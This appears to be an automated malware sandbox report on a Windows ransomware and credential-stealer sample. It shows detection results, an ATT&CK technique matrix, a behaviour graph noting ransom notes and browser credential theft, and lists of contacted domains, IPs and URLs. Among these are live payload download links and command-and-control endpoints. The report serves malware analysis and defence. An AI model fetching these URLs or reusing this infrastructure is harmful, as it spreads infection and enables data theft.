                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D781 sqlite3_bind_zeroblob64,5_2_61E2D781
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D714 sqlite3_bind_zeroblob,5_2_61E2D714
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D68C sqlite3_bind_pointer,5_2_61E2D68C
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D65B sqlite3_bind_null,5_2_61E2D65B
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D635 sqlite3_bind_int,5_2_61E2D635
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D9B0 sqlite3_bind_value,5_2_61E2D9B0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D981 sqlite3_bind_text16,5_2_61E2D981
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D945 sqlite3_bind_text64,5_2_61E2D945
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D916 sqlite3_bind_text,5_2_61E2D916
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D8E7 sqlite3_bind_blob64,5_2_61E2D8E7
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E038CA sqlite3_bind_parameter_count,5_2_61E038CA
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E158CA sqlite3_bind_parameter_index,5_2_61E158CA
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E038DC sqlite3_bind_parameter_name,5_2_61E038DC
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_61E2D8B8 sqlite3_bind_blob,5_2_61E2D8B8

                Mitre Att&ck Matrix

                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpactResource DevelopmentReconnaissance
                Valid Accounts1
                Windows Management Instrumentation                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		1
                Deobfuscate/Decode Files or Information                		1
                OS Credential Dumping                		2
                System Time Discovery                		1
                Taint Shared Content                		11
                Archive Collected Data                		Exfiltration Over Other Network Medium12
                Ingress Tool Transfer                		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without Authorization2
                Data Encrypted for Impact                		Acquire InfrastructureGather Victim Identity Information
                Default Accounts3
                Native API                		1
                Registry Run Keys / Startup Folder                		312
                Process Injection                		4
                Obfuscated Files or Information                		LSASS Memory1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		Exfiltration Over Bluetooth21
                Encrypted Channel                		SIM Card SwapObtain Device Cloud BackupsNetwork Denial of ServiceDomainsCredentials
                Domain Accounts3
                Command and Scripting Interpreter                		1
                Services File Permissions Weakness                		1
                Registry Run Keys / Startup Folder                		22
                Software Packing                		Security Account Manager4
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Screen Capture                		Automated Exfiltration1
                Non-Standard Port                		Data Encrypted for ImpactDNS ServerEmail Addresses
                Local AccountsCronLogin Hook1
                Services File Permissions Weakness                		1
                DLL Side-Loading                		NTDS55
                System Information Discovery                		Distributed Component Object ModelInput CaptureTraffic Duplication2
                Non-Application Layer Protocol                		Data DestructionVirtual Private ServerEmployee Names
                Cloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading                		LSA Secrets1
                Query Registry                		SSHKeyloggingScheduled Transfer113
                Application Layer Protocol                		Data Encrypted for ImpactServerGather Victim Network Information
                Replication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion                		Cached Domain Credentials271
                Security Software Discovery                		VNCGUI Input CaptureData Transfer Size LimitsMultiband CommunicationService StopBotnetDomain Properties
                External Remote ServicesSystemd TimersStartup ItemsStartup Items312
                Process Injection                		DCSync21
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureExfiltration Over C2 ChannelCommonly Used PortInhibit System RecoveryWeb ServicesDNS
                Drive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Services File Permissions Weakness                		Proc Filesystem12
                Process Discovery                		Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
                Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
                Supply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                System Network Configuration Discovery                		Shared WebrootLocal Data StagingExfiltration Over Asymmetric Encrypted Non-C2 ProtocolFile Transfer ProtocolsExternal DefacementCompromise InfrastructureIP Addresses

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1373508 Sample: 9dfb6b41c90732c9206ef6f65a9... Startdate: 12/01/2024 Architecture: WINDOWS Score: 100 55 zexeq.com 2->55 57 brusuax.com 2->57 59 2 other IPs or domains 2->59 75 Snort IDS alert for network traffic 2->75 77 Multi AV Scanner detection for domain / URL 2->77 79 Found malware configuration 2->79 81 13 other signatures 2->81 9 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe 1 17 2->9         started        14 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe 13 2->14         started        16 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe 2->16         started        18 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe 2->18         started        signatures3 process4 dnsIp5 63 api.2ip.ua 172.67.139.220, 443, 49729, 49730 CLOUDFLARENETUS United States 9->63 43 9dfb6b41c90732c920...ad5899c_payload.exe, PE32 9->43 dropped 85 Found stalling execution ending in API Sleep call 9->85 87 Writes a notice file (html or txt) to demand a ransom 9->87 89 Writes many files with high entropy 9->89 20 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe 1 23 9->20         started        25 icacls.exe 9->25         started        65 zexeq.com 175.120.254.9, 49732, 49733, 49735 SKB-ASSKBroadbandCoLtdKR Korea Republic of 14->65 45 C:\Users\user\Desktop\...\XZXHAVGRAG.docx, data 14->45 dropped 47 C:\Users\user\Desktop\WKXEWIOTXI.png, data 14->47 dropped 49 C:\Users\user\Desktop49WTVCDUMOB.pdf, data 14->49 dropped 91 Multi AV Scanner detection for dropped file 14->91 93 Modifies existing user documents (likely ransomware behavior) 14->93 file6 signatures7 process8 dnsIp9 61 brusuax.com 186.147.159.149, 49734, 80 TelmexColombiaSACO Colombia 20->61 35 C:\Users\user\AppData\Local\...\build2[1].exe, PE32 20->35 dropped 37 C:\Users\user\AppData\Local\...\build2.exe, PE32 20->37 dropped 39 C:\Users\user\...\wctF86A.tmp.cdqw (copy), MS-DOS 20->39 dropped 41 46 other malicious files 20->41 dropped 83 Infects executable files (exe, dll, sys, html) 20->83 27 build2.exe 20->27         started        file10 signatures11 process12 signatures13 95 Multi AV Scanner detection for dropped file 27->95 97 Detected unpacking (changes PE section rights) 27->97 99 Detected unpacking (overwrites its own PE header) 27->99 101 5 other signatures 27->101 30 build2.exe 27->30         started        process14 dnsIp15 67 t.me 149.154.167.99, 443, 49736 TELEGRAMRU United Kingdom 30->67 69 116.202.0.196, 10220, 49737, 49741 HETZNER-ASDE Germany 30->69 51 C:\Users\user\AppData\...\sqlite3[1].dll, PE32 30->51 dropped 53 C:\Users\...\77EC63BDA74BD0D0E0426DC8F8008506, Microsoft 30->53 dropped 71 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 30->71 73 Tries to harvest and steal browser information (history, passwords, etc) 30->73 file16 signatures17

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe86%ReversingLabsWin32.Trojan.Glupteba
                9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe78%VirustotalBrowse
                9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe100%AviraHEUR/AGEN.1319085
                9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe79%ReversingLabsWin32.Trojan.StealC
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe79%ReversingLabsWin32.Trojan.StealC
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\sqlite3[1].dll0%ReversingLabs
                C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe86%ReversingLabsWin32.Trojan.Glupteba

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                zexeq.com21%VirustotalBrowse
                brusuax.com19%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://zexeq.com/files/1/build3.exe$run100%URL Reputationmalware
                http://www.wikipedia.com/0%URL Reputationsafe
                https://116.202.0.196:10220freebl3.dllosition:0%Avira URL Cloudsafe
                https://116.202.0.196:10220Content-Disposition:0%Avira URL Cloudsafe
                https://116.202.0.196:102200%Avira URL Cloudsafe
                https://116.202.0.196:10220/msvcp140.dll0%Avira URL Cloudsafe
                http://zexeq.com/files/1/build3.exed100%Avira URL Cloudmalware
                http://zexeq.com/test1/get.php100%Avira URL Cloudmalware
                http://zexeq.com/test1/get.php20%VirustotalBrowse
                https://116.202.0.196:10220/vcruntime140.dllx00%Avira URL Cloudsafe
                https://116.202.0.196:10220/c0%Avira URL Cloudsafe
                http://zexeq.com/files/1/build3.exed17%VirustotalBrowse
                https://116.202.0.196:10220/freebl3.dll0%Avira URL Cloudsafe
                http://zexeq.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637;9100%Avira URL Cloudmalware
                https://116.202.0.196:10220/g0%Avira URL Cloudsafe
                https://we.tl/t-99MNqXMr0%Avira URL Cloudsafe
                https://116.202.0.196:10220/My0%Avira URL Cloudsafe
                https://116.202.0.196:10220/mozglue.dll0%Avira URL Cloudsafe
                https://we.tl/t-99MNqXMr0%VirustotalBrowse
                https://116.202.0.196:10220/sqlite3.dll_0%Avira URL Cloudsafe
                https://116.202.0.196/tdole2.tlbH0%Avira URL Cloudsafe
                https://116.202.0.196:10220/(non)Standard0%Avira URL Cloudsafe
                https://116.202.0.196:10220/mozglue.dlltware0%Avira URL Cloudsafe
                http://brusuax.com/dl/build2.exe100%Avira URL Cloudmalware
                https://116.202.0.196:10220/vcruntime140.dll0%Avira URL Cloudsafe
                http://zexeq.com/files/1/build3.exe$rune100%Avira URL Cloudmalware
                http://brusuax.com/dl/build2.exe25%VirustotalBrowse
                https://116.202.0.196:10220/nss3.dll0%Avira URL Cloudsafe
                https://116.202.0.196:10220/Microsoft0%Avira URL Cloudsafe
                https://116.202.0.196:10220/ll0%Avira URL Cloudsafe
                http://zexeq.com/files/1/build3.exe$rune17%VirustotalBrowse
                https://116.202.0.196:10220/sqlite3.dll.0%Avira URL Cloudsafe
                https://116.202.0.196/0%Avira URL Cloudsafe
                https://116.202.0.196:10220/.0.196:10220/Chedot0%Avira URL Cloudsafe
                https://116.202.0.196:10220/0%Avira URL Cloudsafe
                https://116.202.0.196:10220ng0%Avira URL Cloudsafe
                https://116.202.0.196/n0%Avira URL Cloudsafe
                https://116.202.0.196:10220/vcruntime140.dllal0%Avira URL Cloudsafe
                https://116.202.0.196:10220/msvcp140.dllsJH80%Avira URL Cloudsafe
                https://116.202.0.196:10220nux0%Avira URL Cloudsafe
                http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
                https://116.202.0.196/S0%Avira URL Cloudsafe
                https://116.202.0.196:10220/sqlite3.dll0%Avira URL Cloudsafe
                https://116.202.0.196:10220/nss3.dllt0%Avira URL Cloudsafe
                https://116.202.0.196:10220/freebl3.dlltware0%Avira URL Cloudsafe
                https://116.202.0.196:10220/softokn3.dll0%Avira URL Cloudsafe
                https://we.tl/t-99MNqXMrdS0%Avira URL Cloudsafe
                https://116.202.0.196:10220/softokn3.dllLOCALAPPDATA=C:0%Avira URL Cloudsafe
                https://116.202.0.196:10220/vcruntime140.dllH10%Avira URL Cloudsafe
                https://116.202.0.196:10220/mozglue.dllosition:0%Avira URL Cloudsafe
                https://116.202.0.196:10220/msvcp140.dllge0%Avira URL Cloudsafe
                https://116.202.0.196:10220/freebl3.dllosition:0%Avira URL Cloudsafe
                http://zexeq.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true100%Avira URL Cloudmalware
                https://116.202.0.196:10220/softokn3.dllge0%Avira URL Cloudsafe
                https://116.202.0.196:10220/oft0%Avira URL Cloudsafe
                https://116.202.0.196/amData0%Avira URL Cloudsafe
                https://116.202.0.196:10220/(0%Avira URL Cloudsafe
                https://116.202.0.196:10220/vcruntime140.dllser0%Avira URL Cloudsafe
                http://brusuax.com/dl/build2.exe$run100%Avira URL Cloudmalware
                https://116.202.0.196:10220/mozglue.dlldge0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                t.me
                		149.154.167.99
                		truefalse
                  		high
                  api.2ip.ua
                  		172.67.139.220
                  		truefalse
                    		high
                    zexeq.com
                    		175.120.254.9
                    		truetrueunknown
                    brusuax.com
                    		186.147.159.149
                    		truetrueunknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://zexeq.com/test1/get.phptrue
                    • 20%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://brusuax.com/dl/build2.exetrue
                    • 25%, Virustotal, Browse
                    • Avira URL Cloud: malware
                    		unknown
                    http://zexeq.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=truetrue
                    • Avira URL Cloud: malware
                    		unknown
                    https://api.2ip.ua/geo.jsonfalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17exebuild2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpfalse
                        		high
                        http://zexeq.com/files/1/build3.exed9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2369052197.0000000003610000.00000004.00000020.00020000.00000000.sdmpfalse
                        • 17%, Virustotal, Browse
                        • Avira URL Cloud: malware
                        		unknown
                        https://116.202.0.196:10220Content-Disposition:build2.exe, 00000005.00000002.2903117606.000000000049F000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        https://assets.activity.windows.com/v1/assets9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1963754699.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpfalse
                          		high
                          https://116.202.0.196:10220build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://116.202.0.196:10220freebl3.dllosition:build2.exe, 00000005.00000002.2903117606.0000000000499000.00000040.00000400.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		low
                          https://api.2ip.ua/geo.json(9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000000.00000002.1668297037.0000000000DBE000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://github.com/andre-fuchs/kerning-pairs/blob/master/LICENSE.md).27160079615.ttf.3.dr, 30264859306.ttf.3.drfalse
                              		high
                              https://116.202.0.196:10220/msvcp140.dllbuild2.exe, 00000005.00000002.2908682393.0000000003127000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848136191.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://116.202.0.196:10220/vcruntime140.dllx0build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://116.202.0.196:10220/freebl3.dllbuild2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://116.202.0.196:10220/cbuild2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://zexeq.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637;99dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A21000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              		unknown
                              https://116.202.0.196:10220/gbuild2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://we.tl/t-99MNqXMr9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000002.00000002.2903240410.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2369052197.0000000003610000.00000004.00000020.00020000.00000000.sdmptrue
                              • 0%, Virustotal, Browse
                              • Avira URL Cloud: safe
                              		unknown
                              https://116.202.0.196:10220/Mybuild2.exe, 00000005.00000002.2908682393.0000000003127000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848136191.0000000003118000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848545716.0000000003120000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://116.202.0.196:10220/mozglue.dllbuild2.exe, 00000005.00000002.2903117606.0000000000499000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2907267069.0000000000736000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.2848741906.0000000000735000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://116.202.0.196:10220/sqlite3.dll_build2.exe, 00000005.00000003.1851563800.0000000003628000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000005.00000003.1870105733.0000000003628000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17lsass.exebuild2.exe, 00000005.00000002.2903117606.0000000000576000.00000040.00000400.00020000.00000000.sdmpfalse
                                		high
                                https://api.2ip.ua/k9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316287824.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362476595.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://116.202.0.196/tdole2.tlbHbuild2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://api.2ip.ua/m9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2044340415.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2284812333.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2359837422.0000000000EBC000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2050797457.0000000000EA2000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2316287824.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968891415.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2006792138.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2315470556.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2293082547.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000002.2362476595.0000000000EBD000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2233051739.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2310805053.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1971446235.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2276086910.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1968233667.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2295385362.0000000000EAF000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2283667916.0000000000EA4000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.2294649164.0000000000EA8000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.reddit.com/9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000003.00000003.1960956435.0000000003AD0000.00000004.00001000.00020000.00000000.sdmpfalse
                                      		high
                                      https://api.2ip.ua/geo.json-Agent:9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000003.1840539958.0000000000887000.00000004.00000020.00020000.00000000.sdmp, 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842375819.0000000000889000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://steamcommunity.com/profiles/76561199601319247build2.exe, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                          		high
                                          https://api.2ip.ua/geo.jsonX9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, 00000006.00000002.1842235831.0000000000838000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://116.202.0.196:10220/(non)Standardbuild2.exe, 00000005.00000002.2906708317.0000000000708000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://steamcommunity.com/profiles/76561199601319247helloWFQY12O5J6Nr.$vbuild2.exe, 00000004.00000002.1746811834.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, build2.exe, 00000005.00000002.2903117606.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                              		high
